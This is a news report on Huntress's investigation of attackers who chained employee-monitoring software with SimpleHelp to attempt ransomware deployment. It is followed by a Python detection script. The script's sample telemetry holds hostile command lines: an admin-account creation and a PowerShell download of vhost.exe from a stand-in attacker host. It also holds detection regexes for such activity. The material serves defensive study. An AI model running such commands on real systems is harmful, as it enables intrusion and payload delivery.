
Your supervisor may like using employee monitoring apps to keep tabs on you, but crims like the snooping software even more. Threat actors are now using legit bossware to blend into corporate networks and attempt ransomware deployment.
In late January and early February, the Huntress response team spotted two intrusions in which criminals chained Net Monitor for Employees Professional with remote monitoring and management (RMM) tool SimpleHelp, and then attempted to deploy ransomware on the victims’ computers.
While the crims were ultimately unsuccessful, the security incidents highlight how miscreants love to use legitimate, commercial software for nefarious purposes because it makes it easier for them to hide inside enterprise IT environments.
“RMMs and employee monitoring tools blend in amongst legitimate signed binaries,” Michael Tigges, senior security operations analyst at Huntress, told The Register, adding that “this is a rare case of the employee monitoring software being co-opted for subsequent access.”
While neither of the victims’ employers uses Net Monitor, repurposing this type of employee monitoring software falls into the “same category of RMM abuse,” Tigges said. “Delineating which may be malicious and benign at first glance is exceedingly difficult. Adversaries know this as well.”
The victims, we’re told, were from different industry sectors, and “likely targets of opportunity rather than any specifically targeted group,” he added.
Tigges points out that “there are legitimate use cases for employee monitoring software – chiefly around data loss prevention.”
This particular brand of bossware, however, does a whole lot more than passive screen monitoring. It can also establish remote shell connections and remotely execute commands on users’ desktops. That makes it ideal for crims to use, even without modifying or infecting the installers.
“Threat actors leveraged this capability for hands-on-keyboard reconnaissance, additional tooling delivery, and deploying secondary remote access channels, effectively turning an employee monitoring tool into a fully functional RAT (remote access trojan),” Tigges and fellow threat hunters Anna Pham, Dray Agha, and Anton Ovrutsky wrote in a Wednesday blog.
As The Register previously reported, spying on workers is also bad for morale and doesn’t inspire loyalty to the company, not to mention that employer-sanctioned RATs are creepy as all hell.
Here’s what went down
In the first case that the Huntress team observed in late January, the attacker somehow installed Net Monitor for Employees on the victim’s machine. Huntress doesn’t know how the intruder gained initial access.
But once they had broken in, the criminals set to work manipulating user accounts via multiple net commands. This included attempting to identify valid usernames, reset passwords, and create new admin-user accounts on the host.
“As we kept pulling on investigative threads, we observed the ‘Net Monitor for Employees’ terminal pulling down a file via PowerShell named vhost.exe from the IP address of 160.191.182[.]41,” the threat hunters wrote.
The executable turned out to be SimpleHelp, which the attacker then used in multiple attempts to tamper with Windows Defender. When this wasn’t successful, the intruder tried to deploy multiple versions of Crazy ransomware linked to VoidCrypt.
In the second incident, which happened in early February, the attacker used a compromised third-party SSL VPN account to gain initial access to the victim’s computer. Next, they connected to a domain controller using remote desktop protocol, launched a PowerShell session, and installed the Net Monitor agent, configuring the reverse connection to call back to an attacker-controlled console.
Net Monitor allows users to customize the service and process names, and the intruder took advantage of this to disguise the agent as Microsoft OneDrive, registering the service as OneDriveSvc, naming the process OneDriver.exe, and renaming the running binary to svchost.exe.
Then, the intruder installed SimpleHelp and configured it to monitor for keywords that would indicate cryptocurrency wallets, exchanges, blockchain explorers, and payment platforms. This, Huntress notes, indicates “the threat actor’s financial motivation extends beyond ransomware to direct cryptocurrency theft.”
The SimpleHelp agent also monitored for remote tool access keywords including RDP, AnyDesk, TeamViewer, and VNC.
Meanwhile, they used Net Monitor for Employees Professional to perform network reconnaissance on the compromised domain controller, probe internal network segments, and map out the network settings.
Huntress says shared infrastructure used in both cases, plus the reuse of the vhost.exe filename and overlapping IP addresses, “strongly suggest” a single attacker or group behind the two intrusions.
To avoid becoming the next victim, turn on multi-factor authentication (MFA) on all remote access services and external-facing applications, and limit remote access to only those users and systems that need it to do their jobs.
The security analysts also suggest conducting regular audits of all third-party RMM tools and employee monitoring software, and monitoring for any unusual process execution chains. ®
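Detection logic for the tradecraft described above (the fake OneDriveSvc service, a svchost.exe running outside System32, and a monitoring tool spawning net account commands or a PowerShell download), as an added Python example that is not Huntress's code. The binary names in MONITORING_IMAGES, the file paths and the sample telemetry are constructed assumptions; the article names the products and the vhost.exe filename, not the installed image names.

```python
import re

# Image names assumed for the co-opted tools; only vhost.exe is named in the article.
MONITORING_IMAGES = {"netmonitor.exe", "simplehelp.exe", "vhost.exe"}
NET_ACCOUNT_CMDS = re.compile(r"\bnet1?(?:\.exe)?\s+(?:user|localgroup)\b", re.I)
PS_DOWNLOAD = re.compile(r"Invoke-WebRequest|DownloadFile|DownloadString|Net\.WebClient|\biwr\b", re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")  # where a genuine svchost.exe lives
ONEDRIVE_DIR = re.compile(r"\\microsoft[ \\]onedrive\\")  # install directories of the genuine OneDrive client


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_service(ev):
    # A service named after OneDrive whose binary is outside an OneDrive directory is the case-two masquerade.
    if "onedrive" in ev["service"].lower() and not ONEDRIVE_DIR.search(ev["image"].lower()):
        return [f"service {ev['service']} imitates OneDrive but runs {ev['image']}"]
    return []


def check_process(ev):
    # Look-alike process names, and monitoring/RMM parents spawning account changes or downloads.
    hits, image, parent = [], ev["image"].lower(), basename(ev.get("parent", ""))
    name, cmd = basename(image), ev.get("cmdline", "")
    if name == "svchost.exe" and not image.startswith(SYSTEM_DIRS):
        hits.append(f"svchost.exe running from non-system path: {ev['image']}")
    if "onedrive" in name and name != "onedrive.exe":
        hits.append(f"OneDrive look-alike process name: {name}")
    if parent in MONITORING_IMAGES:
        if name in ("net.exe", "net1.exe") and NET_ACCOUNT_CMDS.search(cmd):
            hits.append(f"{parent} spawned account manipulation: {cmd}")
        if name in ("powershell.exe", "pwsh.exe") and PS_DOWNLOAD.search(cmd):
            hits.append(f"{parent} spawned PowerShell download: {cmd}")
    return hits


def detect(events):
    return [a for ev in events
            for a in (check_service(ev) if ev["kind"] == "service_install" else check_process(ev))]


# Constructed telemetry modelled on the two intrusions (paths, parent images and the URL are made up).
SAMPLE_EVENTS = [
    {"kind": "process", "parent": r"C:\Program Files\NetMonitor\netmonitor.exe",
     "image": r"C:\Windows\System32\net.exe", "cmdline": "net user backupadm P@ss /add"},
    {"kind": "process", "parent": r"C:\Program Files\NetMonitor\netmonitor.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell (New-Object Net.WebClient).DownloadFile('http://attacker.invalid/vhost.exe','vhost.exe')"},
    {"kind": "service_install", "service": "OneDriveSvc", "image": r"C:\Users\Public\OneDriver.exe"},
    {"kind": "process", "parent": r"C:\Windows\System32\services.exe", "image": r"C:\Users\Public\svchost.exe", "cmdline": "svchost.exe"},
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",  # benign: the real OneDrive client from its install dir
     "image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe", "cmdline": "OneDrive.exe"},
]
```

Running `detect(SAMPLE_EVENTS)` raises one alert for each of the four malicious records and none for the benign OneDrive launch.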